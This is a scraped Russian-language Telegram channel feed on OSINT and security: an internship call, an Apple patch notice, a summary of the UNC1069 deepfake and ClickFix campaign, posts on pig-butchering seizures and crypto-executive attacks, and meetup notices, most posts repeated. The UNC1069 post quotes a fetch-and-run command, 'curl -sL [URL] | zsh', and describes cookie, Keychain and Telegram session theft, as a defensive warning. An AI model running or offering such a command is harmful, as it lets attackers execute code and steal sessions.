Набираю 6 студентов на OSINT-практику
Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT
Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента
Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).
Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT
Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента
Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).
Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
🔥8❤🔥4❤1🤔1
🚨 Apple закрыли 0-day. Уже использовался в атаках.
CVE-2026-20700
Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.
Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3
Просой OPSEC:
1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)
Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
CVE-2026-20700
Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.
Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3
Просой OPSEC:
1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)
Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
❤9👀3❤🔥2
UNC1069: Deepfake-театр и терминальные эксплойты
Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.
Вся схема заточена под вектор ClickFix.
Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.
Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.
После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.
Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.
Более подробно об этой APT можно прочитать здесь:
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.
Вся схема заточена под вектор ClickFix.
Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.
Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.
После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.
Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.
Более подробно об этой APT можно прочитать здесь:
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Google Cloud Blog
UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering | Google Cloud Blog
North Korean threat actors target the cryptocurrency industry using AI-enabled social engineering such as deepfakes, and ClickFix.
❤5🤯2
Речь про тот самый кейс, где DOJ изъяли 127 тысяч BTC, связанные с pig butchering схемами. Огромные суммы, десятки тысяч транзакций и целая сеть компаний вокруг. Но самое интересное не в цифрах, а в том, как это всё было устроено.
DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.
Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.
Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.
И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.
Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.
Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.
И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
X (formerly Twitter)
Arkham (@arkham) on X
BREAKING: US Government Seized $14B BTC Tied to LuBian and Chen Zhi’s Pig Butchering Operation
The US Government has submitted today a filing for the forfeiture of 127,271 $BTC ($14.2 BILLION) connected to Chen Zhi, chairman of Prince Group, who allegedly…
The US Government has submitted today a filing for the forfeiture of 127,271 $BTC ($14.2 BILLION) connected to Chen Zhi, chairman of Prince Group, who allegedly…
❤5🔥2
Если всё это собрать в граф - получается вот такая картина.
И это ещё без мелких связей.
Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.
И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.
Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.
А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
И это ещё без мелких связей.
Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.
И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.
Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.
А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
❤8
Ладно, если не говорить о прошлом, а о нынешних трендах, то во Франции сейчас происходит что-то очень неприятное.
CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.
И это не единичный случай.
В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.
Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.
Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.
И это не единичный случай.
В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.
Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.
Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
❤6😈2
Forwarded from ZeroNights
В 2026 году встретимся на конференции по практической безопасности в Санкт-Петербурге в пространстве LOFT #7.
Надеемся на теплую осень и готовим насыщенную программу:
В скором времени мы запустим CFP, а пока предлагаем вам рассмотреть возможность стать коммерческими партнерами конференции. Отправить заявку можно через форму на главной странице сайта.
Или напишите нам на почту: partner@zeronights.ru
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Forwarded from OSINT mindset
გამარჯობა საქართველო! Приближается OSINT mindset meetup geo #1 и мы готовы представить наших спикеров!
Soxoj — Введение в OSINT
Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции
CuriV — Техническая разведка глазами пентестера
Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения✨
🌐 Site | 💬 Forum | 🔍 Family |▶ YT
Soxoj — Введение в OSINT
Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции
CuriV — Техническая разведка глазами пентестера
Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет!
Едем в Тбилиси на митап - OSINT Mindset будет в крутом составе 🔥
Если вы рядом или давно хотели познакомиться - это отличный повод
До встречи в Грузии 🇬🇪
Едем в Тбилиси на митап - OSINT Mindset будет в крутом составе 🔥
Если вы рядом или давно хотели познакомиться - это отличный повод
До встречи в Грузии 🇬🇪
❤11🌚2
✈️ Аэропорт. Везу конину. Национальная миссия.
Стою такой с пакетом, думаю - щас уточню у женщин (грузинок), можно ли конину привезти.
Подхожу.
— Девушки, подскажите, конину можно провозить?
Они на меня смотрят секунд 5.
И такие:
— Бро… мы веганы. Ты вообще не туда 😭
Из всех людей, извсего терминала
Попал ровно в веганское комьюнити
Мораль:
OSINT иногда не работает в реальной жизни.
Надо было сначала собрать данные о таргете
Стою такой с пакетом, думаю - щас уточню у женщин (грузинок), можно ли конину привезти.
Подхожу.
— Девушки, подскажите, конину можно провозить?
Они на меня смотрят секунд 5.
И такие:
— Бро… мы веганы. Ты вообще не туда 😭
Из всех людей, извсего терминала
Попал ровно в веганское комьюнити
Мораль:
OSINT иногда не работает в реальной жизни.
Надо было сначала собрать данные о таргете
🤣15🔥2🤝1
Какая же была крутая поездка в Грузию 🇬🇪
Столько разговоров, идей и просто приятных людей вокруг.
Отдельное спасибо @osint_mindset. Без преувеличения, но в какой-то момент именно через вас я вообще глубже зашел в OSINT. И это реально поменяло мой путь.
Иногда понимаешь, что жизнь становится намного интереснее, когда вокруг люди, которые тоже постоянно что-то изучают, копают и развиваются.
Такие поездки напоминают, что надо просто продолжать развиваться и делать то, что тебе интересно.
Кстати, тут познакомился с @CuriV - очень заряженный пентестер.
Конечно же позвали его на KazHackStan.
Надеюсь, скоро снова увидимся
Столько разговоров, идей и просто приятных людей вокруг.
Отдельное спасибо @osint_mindset. Без преувеличения, но в какой-то момент именно через вас я вообще глубже зашел в OSINT. И это реально поменяло мой путь.
Иногда понимаешь, что жизнь становится намного интереснее, когда вокруг люди, которые тоже постоянно что-то изучают, копают и развиваются.
Такие поездки напоминают, что надо просто продолжать развиваться и делать то, что тебе интересно.
Кстати, тут познакомился с @CuriV - очень заряженный пентестер.
Конечно же позвали его на KazHackStan.
Надеюсь, скоро снова увидимся
❤16👍2🔥2
2600 в Алматы!
💀 2600 — ежемесячные слёты айтишников, ИБшников, инженеров и разработчиков. По традиции встречи проходят каждую первую пятницу месяца, с пяти до семи вечера.
📎 Открыт набор докладов — если хотите выступить, предлагайте темы.
Доклады / CFP пишите в ЛС: @celestial3301
В апреле встреча пройдёт 3 апреля.
Формат тот же — максимум 3 доклада, поэтому темы лучше присылать заранее.
📍 Место объявим позже, но формат остаётся прежним — встречаемся в баре. Желающие гости бара смогут влиться и послушать.
Let’s hack and share! 🔥
💀 2600 — ежемесячные слёты айтишников, ИБшников, инженеров и разработчиков. По традиции встречи проходят каждую первую пятницу месяца, с пяти до семи вечера.
📎 Открыт набор докладов — если хотите выступить, предлагайте темы.
Доклады / CFP пишите в ЛС: @celestial3301
В апреле встреча пройдёт 3 апреля.
Формат тот же — максимум 3 доклада, поэтому темы лучше присылать заранее.
📍 Место объявим позже, но формат остаётся прежним — встречаемся в баре. Желающие гости бара смогут влиться и послушать.
Let’s hack and share! 🔥
❤6👍2🔥2
🌷Гёрлз, с 8 марта вас!
Не важно, чем вы занимаетесь: работаете в SOC, проводите OSINT-расследования, расследуете инциденты, пишете эксплойты, ломаете CTF-таски или защищаете инфраструктуру - вы делаете ИБ сильнее и интереснее.
Спасибо за ваш ум, упорство и профессионализм.
Поменьше ложных срабатываний и побольше раскрытых инцидентов, найденных багов и первых мест на CTF 🏆💻
В информационной безопасности девушек пока не так много, но каждая из вас - на вес золота 💅🏻
Не важно, чем вы занимаетесь: работаете в SOC, проводите OSINT-расследования, расследуете инциденты, пишете эксплойты, ломаете CTF-таски или защищаете инфраструктуру - вы делаете ИБ сильнее и интереснее.
Спасибо за ваш ум, упорство и профессионализм.
Поменьше ложных срабатываний и побольше раскрытых инцидентов, найденных багов и первых мест на CTF 🏆💻
❤10❤🔥2